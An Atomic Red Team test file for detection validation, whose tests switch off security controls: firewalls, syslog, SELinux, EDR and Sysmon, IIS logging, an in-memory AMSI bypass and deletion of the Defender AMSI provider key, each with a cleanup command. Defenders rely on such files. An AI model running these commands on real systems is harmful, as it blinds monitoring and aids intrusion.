a969a01805
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key.
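---
# Atomic Red Team technique file for T1089 (Disabling Security Tools).
# Every entry under atomic_tests disables or removes a security control so
# that detection coverage for that behaviour can be validated on a test host.
# Each test carries a cleanup_command that puts the control back; check the
# comments on the individual tests for what the cleanup does and does not
# restore.
attack_technique: T1089
display_name: Disabling Security Tools

atomic_tests: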
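- name: Disable iptables firewall
  description: |
    Disables the iptables firewall
  supported_platforms:
  - linux
  executor:
    name: sh
    # Stopping and disabling system services requires root.
    elevation_required: true
    # Only CentOS 6 (SysV init / iptables) and CentOS 7 (systemd / firewalld)
    # are handled; any other distribution falls through and does nothing.
    # The rpm output is quoted so a missing centos-release package yields a
    # single non-matching word instead of a broken test expression, and
    # "else if" (which would need a second "then"/"fi") is written as "elif".
    # chkconfig takes the service name before the on/off state.
    command: |
      if [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" = "6" ]; then
        service iptables stop
        chkconfig iptables off
        service ip6tables stop
        chkconfig ip6tables off
      elif [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" = "7" ]; then
        systemctl stop firewalld
        systemctl disable firewalld
      fi
    # Re-enables and restarts the firewall service that the test stopped.
    cleanup_command: |
      if [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" = "6" ]; then
        chkconfig iptables on
        service iptables start
        chkconfig ip6tables on
        service ip6tables start
      elif [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" = "7" ]; then
        systemctl enable firewalld
        systemctl start firewalld
      fi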
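- name: Disable syslog
  description: |
    Disables syslog collection
  supported_platforms:
  - linux
  executor:
    name: sh
    # Stopping and disabling system services requires root.
    elevation_required: true
    # Only CentOS 6 (SysV init) and CentOS 7 (systemd) are handled; other
    # distributions fall through and do nothing. The rpm output is quoted so a
    # missing centos-release package cannot break the test expression, the
    # second branch uses "elif" (the original "else if" was missing its
    # "then"/"fi"), and chkconfig takes the service name before the state.
    command: |
      if [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" = "6" ]; then
        service rsyslog stop
        chkconfig rsyslog off
      elif [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" = "7" ]; then
        systemctl stop rsyslog
        systemctl disable rsyslog
      fi
    # Restores log collection so the host is not left without syslog after
    # the test.
    cleanup_command: |
      if [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" = "6" ]; then
        chkconfig rsyslog on
        service rsyslog start
      elif [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" = "7" ]; then
        systemctl enable rsyslog
        systemctl start rsyslog
      fi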
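- name: Disable Cb Response
  description: |
    Disable the Cb Response service
  supported_platforms:
  - linux
  executor:
    name: sh
    # Stopping and disabling system services requires root.
    elevation_required: true
    # Only CentOS 6 (SysV init) and CentOS 7 (systemd) are handled; other
    # distributions fall through and do nothing. The rpm output is quoted so a
    # missing centos-release package cannot break the test expression, the
    # second branch uses "elif" (the original "else if" was missing its
    # "then"/"fi"), and chkconfig takes the service name before the state.
    command: |
      if [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" = "6" ]; then
        service cbdaemon stop
        chkconfig cbdaemon off
      elif [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" = "7" ]; then
        systemctl stop cbdaemon
        systemctl disable cbdaemon
      fi
    # Re-enables and restarts the sensor service the test stopped.
    cleanup_command: |
      if [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" = "6" ]; then
        chkconfig cbdaemon on
        service cbdaemon start
      elif [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" = "7" ]; then
        systemctl enable cbdaemon
        systemctl start cbdaemon
      fi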
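- name: Disable SELinux
  description: |
    Disables SELinux enforcement
  supported_platforms:
  - linux
  executor:
    name: sh
    # Changing the SELinux mode requires root.
    elevation_required: true
    # Switches the running system to permissive mode only; the persistent
    # on-disk SELinux configuration is not touched, so the change does not
    # survive a reboot.
    command: |
      setenforce 0
    # Returns the running system to enforcing mode.
    cleanup_command: |
      setenforce 1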
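- name: Disable Carbon Black Response
  description: |
    Disables Carbon Black Response
  supported_platforms:
  - macos
  executor:
    name: sh
    # The command already invokes sudo; the daemon plist lives under
    # /Library/LaunchDaemons, which needs administrative rights to unload.
    elevation_required: true
    command: |
      sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
    # Loads the same launch daemon again so the sensor is running after the test.
    cleanup_command: |
      sudo launchctl load /Library/LaunchDaemons/com.carbonblack.daemon.plist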
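- name: Disable LittleSnitch
  description: |
    Disables LittleSnitch
  supported_platforms:
  - macos
  executor:
    name: sh
    # The command already invokes sudo; the daemon plist lives under
    # /Library/LaunchDaemons, which needs administrative rights to unload.
    elevation_required: true
    command: |
      sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
    # Loads the same launch daemon again so the firewall is running after the test.
    cleanup_command: |
      sudo launchctl load /Library/LaunchDaemons/at.obdev.littlesnitchd.plist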
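- name: Disable OpenDNS Umbrella
  description: |
    Disables OpenDNS Umbrella
  supported_platforms:
  - macos
  executor:
    name: sh
    # The command already invokes sudo; the daemon plist lives under
    # /Library/LaunchDaemons, which needs administrative rights to unload.
    elevation_required: true
    command: |
      sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
    # Loads the same launch daemon again so the roaming client is running after the test.
    cleanup_command: |
      sudo launchctl load /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist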
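- name: Unload Sysmon Filter Driver
  description: |
    Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
  supported_platforms:
  - windows
  input_arguments:
    sysmon_driver:
      description: The name of the Sysmon filter driver (this can change from the default)
      type: string
      default: SysmonDrv
  executor:
    name: command_prompt
    elevation_required: true
    # findstr exits non-zero when no loaded filter matches the given name, so
    # the prerequisite fails if the driver is not currently loaded.
    prereq_command: |
      fltmc.exe filters | findstr #{sysmon_driver}
    # Leaves the Sysmon service running but without its filter driver, which
    # is the state a detection for this technique should catch.
    command: |
      fltmc.exe unload #{sysmon_driver}
    # The service is stopped before the driver is reloaded and then started
    # again so the service re-attaches to the driver.
    cleanup_command: |
      sc stop sysmon
      fltmc.exe load #{sysmon_driver}
      sc start sysmon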
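- name: Disable Windows IIS HTTP Logging
  description: |
    Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
    This action requires HTTP logging configurations in IIS to be unlocked.
  supported_platforms:
  - windows
  input_arguments:
    website_name:
      description: The name of the website on a server
      type: string
      default: Default Web Site
  executor:
    name: command_prompt
    # appcmd writes the server configuration, which requires an elevated prompt.
    elevation_required: true
    command: |
      C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
    # Re-enables HTTP logging for the site; without this the server would be
    # left unlogged after the test.
    cleanup_command: |
      C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false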
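- name: Uninstall Sysmon
  description: |
    Uninstall Sysinternals Sysmon for Defense Evasion

  supported_platforms:
  - windows

  executor:
    name: command_prompt
    elevation_required: true
    # sc query exits non-zero when the service does not exist, so the test
    # only runs where Sysmon is actually installed.
    prereq_command: |
      sc query sysmon > nul
    # Assumes sysmon.exe is on PATH.
    command: |
      sysmon -u
    # Reinstalls Sysmon with its default configuration. A previously applied
    # custom configuration is not restored by this cleanup and has to be
    # re-applied separately.
    cleanup_command: |
      sysmon -i -accepteula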
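- name: AMSI Bypass - AMSI InitFailed
  description: |
    An easy way to bypass AMSI inspection is to patch the DLL in memory, setting the "amsiInitFailed" field to true.
    https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
  supported_platforms:
  - windows

  executor:
    name: powershell
    # Sets a static field via reflection inside the running PowerShell process;
    # no administrative rights are involved.
    elevation_required: false
    command: |
      [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
    # Resets the same field so AMSI is consulted again in this session.
    cleanup_command: |
      [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)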
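- name: AMSI Bypass - Remove AMSI Provider Reg Key
  description: |
    With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
    This test removes the Windows Defender provider registry key.

  supported_platforms:
  - windows

  executor:
    name: powershell
    elevation_required: true
    # -Recurse deletes the provider key together with every value and subkey
    # beneath it.
    command: |
      Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
    # Recreates only the bare provider key; the values and subkeys removed by
    # the command above are not restored. Export the key before running the
    # test if its original contents are needed afterwards.
    cleanup_command: |
      New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"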